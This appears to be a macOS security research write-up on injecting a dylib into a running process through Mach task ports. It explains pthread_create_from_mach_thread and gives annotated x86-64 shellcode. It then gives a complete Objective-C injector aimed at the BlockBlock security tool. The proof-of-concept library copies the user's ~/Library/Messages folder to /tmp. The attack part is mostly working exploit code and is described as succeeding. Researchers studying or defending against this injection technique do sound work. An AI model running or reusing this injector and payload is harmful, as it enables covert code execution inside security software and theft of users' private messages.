Inject a Dylib
Prompt Mach Thread to POSIX Thread
Threads are implemented in the Mach kernel, and each thread belongs to a task. However, being a POSIX-compliant system, threads can be also manipulated via the POSIX pthread API. Some parts of the system expect to work with pthread while other parts work with the Mach API, meaning we'll need to ensure the thread we create can conform to both. This duality doesn't cause issues with the execv system call we used earlier, so we didn't need to deal with it; however, with more complex function calls these issues can cause them to terminate or not work at all.
In short: macOS supports both mach API and Unix API, this dual support can sometimes lead to complications.
The previous thread injection relied on access to the remote process's task port, finally calling thread_create_running to start a thread. Mach threads are not created with a corresponding POSIX thread structure, meaning any call to the pthread API will fail. To work with pthread function calls, we should prompt Mach thread to POSIX thread.
Before 10.14(Mojave), it can be achieved through _pthread_set_self API with a NULL pointer.
void
_pthread_set_self(pthread_t p)
{
return _pthread_set_self_internal(p, true);
}
static inline void
_pthread_set_self_internal(pthread_t p, bool needs_tsd_base_set)
{
if (p == NULL) {
p = &_thread;
}
uint64_t tid = __thread_selfid();
if (tid == -1ull) {
PTHREAD_ABORT("failed to set thread_id");
}
p->tsd[_PTHREAD_TSD_SLOT_PTHREAD_SELF] = p;
p->tsd[_PTHREAD_TSD_SLOT_ERRNO] = &p->err_no;
p->thread_id = tid;
if (needs_tsd_base_set) {
_thread_set_tsd_base(&p->tsd[0]);
}
}
Since 10.14, the function code changed:
void
_pthread_set_self(pthread_t p)
{
#if VARIANT_DYLD
if (os_likely(!p)) {
return _pthread_set_self_dyld();
}
#endif // VARIANT_DYLD
_pthread_set_self_internal(p);
_thread_set_tsd_base(&p->tsd[0]);
}
We notice _pthread_set_self_dyld and _pthread_set_self_internal. The dyld version is not accessible from user space, while another one is accessible.
void
_pthread_set_self_dyld(void)
{
pthread_t p = main_thread();
p->thread_id = __thread_selfid();
if (os_unlikely(p->thread_id == -1ull)) {
PTHREAD_INTERNAL_CRASH(0, "failed to set thread_id");
}
p->tsd[_PTHREAD_TSD_SLOT_PTHREAD_SELF] = p;
p->tsd[_PTHREAD_TSD_SLOT_ERRNO] = &p->err_no;
_thread_set_tsd_base(&p->tsd[0]);
}
static inline void
_pthread_set_self_internal(pthread_t p)
{
os_atomic_store(&p->thread_id, __thread_selfid(), relaxed);
if (os_unlikely(p->thread_id == -1ull)) {
PTHREAD_INTERNAL_CRASH(0, "failed to set thread_id");
}
}
In this version, _pthread_set_self_internal will no longer set up the thread structure since it expects to find a valid thread structure already present. If we pass NULL in place of the thread structure pointer, the function will crash due to a NULL pointer dereference.
Therefore, another option _pthread_create_from_mach_thread comes.
/*
* A version of pthread_create that is safely callable from an injected mach thread.
*
* The _create introspection hook will not fire for threads created from this function.
*
* It is not safe to call this function concurrently.
*/
__API_AVAILABLE(macos(10.12), ios(10.0), tvos(10.0), watchos(3.0))
(...)
int pthread_create_from_mach_thread(pthread_t * __restrict,
const pthread_attr_t * _Nullable __restrict,
void *(* _Nonnull)(void *), void * _Nullable __restrict);
This function allows a pthread to be created from a mach thread.
int
pthread_create_from_mach_thread(pthread_t *thread, const pthread_attr_t *attr,
void *(*start_routine)(void *), void *arg)
{
unsigned int flags = _PTHREAD_CREATE_FROM_MACH_THREAD;
return _pthread_create(thread, attr, start_routine, arg, flags);
}
Compared to the original solution, this function will not promote our thread into a valid pthread, but create a new, valid pthread instead. Therefore, our plan is to use injected Mach thread to create a new, fully-configured pthread. We have to pass in an address that holds a pthread structure, and the location of the start routine. The other args can be NULL, i.e. pthread_create_from_mach_thread(address of a pthread structure, 0, location of the start routine ,0)
Shellcode
The shellcode should have 2 essential components:
- Create a new thread from our Mach thread, calling pthread_create_from_mach_thread.
- The new thread calls dlopen to load the dylib of our choice.
Complete shellcode:
;bootstrap Mach thread
_shellcode:
0: 55 push rbp ; function prologue
1: 48 89 e5 mov rbp,rsp
4: 48 83 ec 10 sub rsp,0x10
8: 48 8d 7d f8 lea rdi,[rbp-8] ; arg0=rdi=address of (rbp-8)
c: 48 31 f6 xor rsi,rsi ; arg1=rsi=0
f: 48 31 c9 xor rcx,rcx ; arg3=rcx=0
12: 48 8d 15 0e 00 00 00 lea rdx,[rip+0xe] ; arg2=rdx= address of (_thread)
19: 48 b8 50 54 48 52 44 movabs rax,0x5452434452485450 ; move addresss of pthread_create_from_mach_thread into rax
20: 43 52 54
23: ff d0 call rax ; call pthread_create_from_mach_thread
_jump:
25: eb fe jmp 25 <_jump> ; infinite loop
;the new thread to start dlopen
_thread:
27: 55 push rbp ; function prologue
28: 48 89 e5 mov rbp,rsp
2b: 48 83 ec 10 sub rsp,0x10
2f: 6a 01 push 0x1
31: 5e pop rsi ; arg1 = rsi = RTLD_LAZY
32: 48 8d 3d 12 00 00 00 lea rdi,[rip+0x12] ; arg0 = rdi = address of (_thread+0x24)
39: 48 b8 44 4c 4f 50 45 movabs rax,0x5f5f4e45504f4c44
40: 4e 5f 5f
43: ff d0 call rax ; call dlopen
45: 48 83 c4 10 add rsp,0x10 ; function epilogue
49: 5d pop rbp
4a: c3 ret
4b: LIBLIBLIBLIB... ; placeholder for our DYLIB string
In _shellcode section, we set rdi, which is the 1st arg to as an address to store the new pthread structure. Set rdx, which is the 3rd arg to point to the start routine of the new thread(+0x27) via RIP-relative addressing.
We set a placeholder value for rax at 0x19, which we will patch later. And there is an infinite loop to prevent the thread from exiting.
To call dlopen(), we new to pass 2 args.
void* dlopen(const char* path, int mode);
The preferred mode is 0x1.
#define RTLD_LAZY 0x1
rip+0x12 points to the 0x4b, where is the placeholder string.
We can use dlsym function to look up functions' addresses within dlfcn.h.
The initial shellcode:
char shellcode[] =
"\x55" // push rbp
"\x48\x89\xE5" // mov rbp, rsp
"\x48\x83\xEC\x10" // sub rsp, 0x10
"\x48\x8D\x7D\xF8" // lea rdi, qword [rbp-8]
"\x48\x31\xc9" // xor rcx,rcx
"\x48\x31\xf6" // xor rsi,rsi
"\x48\x8D\x15\x0E\x00\x00\x00" // lea rdx, qword ptr [rip + 0xe]
"\x48\xB8" // movabs rax, pthread_create_from_mach_thread
"PTHRDCRT"
"\xFF\xD0" // call rax
"\xEB\xFE" // jmp -2
"\x55" // push rbp
"\x48\x89\xE5" // mov rbp, rsp
"\x48\x83\xEC\x10" // sub rsp, 0x10
"\x6A\x01" // push 1
"\x5E" // pop rsi
"\x48\x8D\x3D\x12\x00\x00\x00" // lea rdi, qword ptr [rip + 0x12]
"\x48\xB8" // movabs rax, dlopen
"DLOPEN__"
"\xFF\xD0" // call rax
"\x48\x83\xC4\x10" // add rsp, 0x10
"\x5D" // pop rbp
"\xC3" // ret
"LIBLIBLIBLIB"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
However, we need to patch placeholder values before the injection.
Apart from using dlsym, we can also refer to the function directly to get their addresses, e.g. importing pthread.h header.
char* lib = "/tmp/bb.dylib";
uint64_t addr_of_pthread_create = (uint64_t)dlsym(RTLD_DEFAULT, "pthread_create_from_mach_thread");
uint64_t addr_of_dlopen = (uint64_t)dlopen;
char *possible_patch_location = (shellcode);
int i=0;
for (i = 0; i < 0x100; i++) {
possible_patch_location++;
if (memcmp(possible_patch_location, "PTHRDCRT", 8) == 0) {
printf("pthread_create_from_mach_thread @%llx\n", addr_of_pthread_create);
memcpy(possible_patch_location, &addr_of_pthread_create, 8);
}
if (memcmp(possible_patch_location, "DLOPEN__", 6) == 0) {
printf("dlopen @%llx\n", addr_of_dlopen);
memcpy(possible_patch_location, &addr_of_dlopen, sizeof(uint64_t));
}
if (memcmp(possible_patch_location, "LIBLIBLIB", 9) == 0) {
strcpy(possible_patch_location, lib);
}
}
pthread_create_from_mach_thread's address was obtained via dlsym function, while dlopen's address was obtained via type casting.
Create a poc for the dylib:
#include <stdlib.h>
__attribute__((constructor))
static void customConstructor(int argc, const char **argv) {
system("cp -r ~/Library/Messages/ /tmp/Messages/");
exit(0);
}
Complete code:
#import <Foundation/Foundation.h>
#import <AppKit/AppKit.h>
#include <mach/mach_vm.h>
#include <sys/sysctl.h>
#include <dlfcn.h>
#include <pthread.h>
#define STACK_SIZE 0x1000
#define CODE_SIZE 128
char shellcode[] =
"\x55" // push rbp
"\x48\x89\xE5" // mov rbp, rsp
"\x48\x83\xEC\x10" // sub rsp, 0x10
"\x48\x8D\x7D\xF8" // lea rdi, qword [rbp-8]
"\x48\x31\xc9" // xor rcx,rcx
"\x48\x31\xf6" // xor rsi,rsi
"\x48\x8D\x15\x0E\x00\x00\x00" // lea rdx, qword ptr [rip + 0xe]
"\x48\xB8" // movabs rax, pthread_create_from_mach_thread
"PTHRDCRT"
"\xFF\xD0" // call rax
"\xEB\xFE" // jmp -2
"\x55" // push rbp
"\x48\x89\xE5" // mov rbp, rsp
"\x48\x83\xEC\x10" // sub rsp, 0x10
"\x6A\x01" // push 1
"\x5E" // pop rsi
"\x48\x8D\x3D\x12\x00\x00\x00" // lea rdi, qword ptr [rip + 0x12]
"\x48\xB8" // movabs rax, dlopen
"DLOPEN__"
"\xFF\xD0" // call rax
"\x48\x83\xC4\x10" // add rsp, 0x10
"\x5D" // pop rbp
"\xC3" // ret
"LIBLIBLIBLIB"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
uid_t get_uid(pid_t pid)
{
uid_t uid = 0;
struct kinfo_proc process;
size_t buffer_size = sizeof(process);
// Compose search path for sysctl. Here you can specify PID directly.
const u_int mib_len = 4;
int mib[mib_len] = {CTL_KERN, KERN_PROC, KERN_PROC_PID, pid};
int sysctl_result = sysctl(mib, mib_len, &process, &buffer_size, NULL, 0);
// If sysctl did not fail and process with PID available - take UID.
if ((sysctl_result == 0) && (buffer_size != 0)) {
uid = process.kp_eproc.e_ucred.cr_uid;
}
return uid;
}
pid_t get_pid(NSString* bundle_id) {
pid_t pid = 0;
uid_t uid = -1;
//find applications with bundle ID
NSArray *runningApplications = [NSRunningApplication runningApplicationsWithBundleIdentifier:bundle_id];
//check if any found at all
if (runningApplications.count > 1) {
for (id app in runningApplications) {
pid = [app processIdentifier];
uid = get_uid(pid);
if (uid != 0) {
//if not root (=0) return
return pid;
}
}
}
//if we got here, t means that we didn't find an instance
printf("[-] There is no instance of the application running as user, exiting...\n");
exit(-1);
}
int main(int argc, const char * argv[]) {
pid_t pid = get_pid(@"com.objectiveSee.BlockBlock");
task_t remoteTask;
kern_return_t kr = task_for_pid(mach_task_self(), pid, &remoteTask);
if (kr != KERN_SUCCESS) {
printf("[-] Failed to get task port for pid:%d, error: %s\n", pid, mach_error_string(kr));
return(-1);
}
else {
printf("[+] Got access to the task port of process: %d\n", pid);
}
mach_vm_address_t remoteStack64 = (vm_address_t) NULL;
mach_vm_address_t remoteCode64 = (vm_address_t) NULL;
kr = mach_vm_allocate(remoteTask, &remoteStack64, STACK_SIZE, VM_FLAGS_ANYWHERE);
if (kr != KERN_SUCCESS) {
printf("[-] Failed to allocate stack memory in remote thread, error: %s\n", mach_error_string(kr));
exit(-1);
} else {
printf("[+] Allocated remote stack: 0x%llx\n", remoteStack64);
}
kr = mach_vm_allocate( remoteTask, &remoteCode64, CODE_SIZE, VM_FLAGS_ANYWHERE );
if (kr != KERN_SUCCESS) {
printf("[-] Failed to allocate code memory in remote thread, error: %s\n", mach_error_string(kr));
exit(-1);
} else {
printf("[+] Allocated remote code placeholder: 0x%llx\n", remoteCode64);
}
char* lib = "/tmp/bb.dylib";
uint64_t addr_of_pthread_create = (uint64_t)dlsym(RTLD_DEFAULT, "pthread_create_from_mach_thread");
uint64_t addr_of_dlopen = (uint64_t)dlopen;
char *possible_patch_location = (shellcode);
int i=0;
for (i = 0; i < 0x100; i++) {
possible_patch_location++;
if (memcmp(possible_patch_location, "PTHRDCRT", 8) == 0) {
printf("pthread_create_from_mach_thread @%llx\n", addr_of_pthread_create);
memcpy(possible_patch_location, &addr_of_pthread_create, 8);
}
if (memcmp(possible_patch_location, "DLOPEN__", 6) == 0) {
printf("dlopen @%llx\n", addr_of_dlopen);
memcpy(possible_patch_location, &addr_of_dlopen, sizeof(uint64_t));
}
if (memcmp(possible_patch_location, "LIBLIBLIB", 9) == 0) {
strcpy(possible_patch_location, lib);
}
}
kr = mach_vm_write(remoteTask, remoteCode64, (vm_address_t) shellcode, CODE_SIZE);
if (kr != KERN_SUCCESS) {
printf("[-] Failed to write into remote thread memory, error: %s\n", mach_error_string(kr));
exit(-1);
}
kr = vm_protect(remoteTask, remoteCode64, CODE_SIZE, FALSE, VM_PROT_READ | VM_PROT_EXECUTE);
if (kr != KERN_SUCCESS) {
printf("[!] Failed to give injected code memory proper permissions, error: %s\n", mach_error_string(kr));
exit(-1);
}
kr = vm_protect(remoteTask, remoteStack64, STACK_SIZE, TRUE, VM_PROT_READ | VM_PROT_WRITE);
if (kr != KERN_SUCCESS) {
printf("[!] Failed to give stack memory proper permissions, error: %s\n", mach_error_string(kr));
exit(-1);
}
x86_thread_state64_t remoteThreadState64;
memset(&remoteThreadState64, '\0', sizeof(remoteThreadState64) );
//shift stack
remoteStack64 += (STACK_SIZE / 2); // this is the real stack
// set remote instruction pointer
remoteThreadState64.__rip = (u_int64_t) remoteCode64;
// set remote Stack Pointer
remoteThreadState64.__rsp = (u_int64_t) remoteStack64;
remoteThreadState64.__rbp = (u_int64_t) remoteStack64;
printf ("[+] Remote Stack 64 0x%llx, Remote code is 0x%llx\n", remoteStack64, remoteCode64 );
//thread variable
thread_act_t remoteThread;
//create thread
kr = thread_create_running( remoteTask, x86_THREAD_STATE64,
(thread_state_t) &remoteThreadState64, x86_THREAD_STATE64_COUNT, &remoteThread);
if (kr != KERN_SUCCESS) {
printf("[-] Exploit failed: error: %s\n", mach_error_string (kr));
return (-1);
}
printf("[+] Exploit succeeded! Check /tmp/\n");
return (0);
}
Compile them:
The exploit works.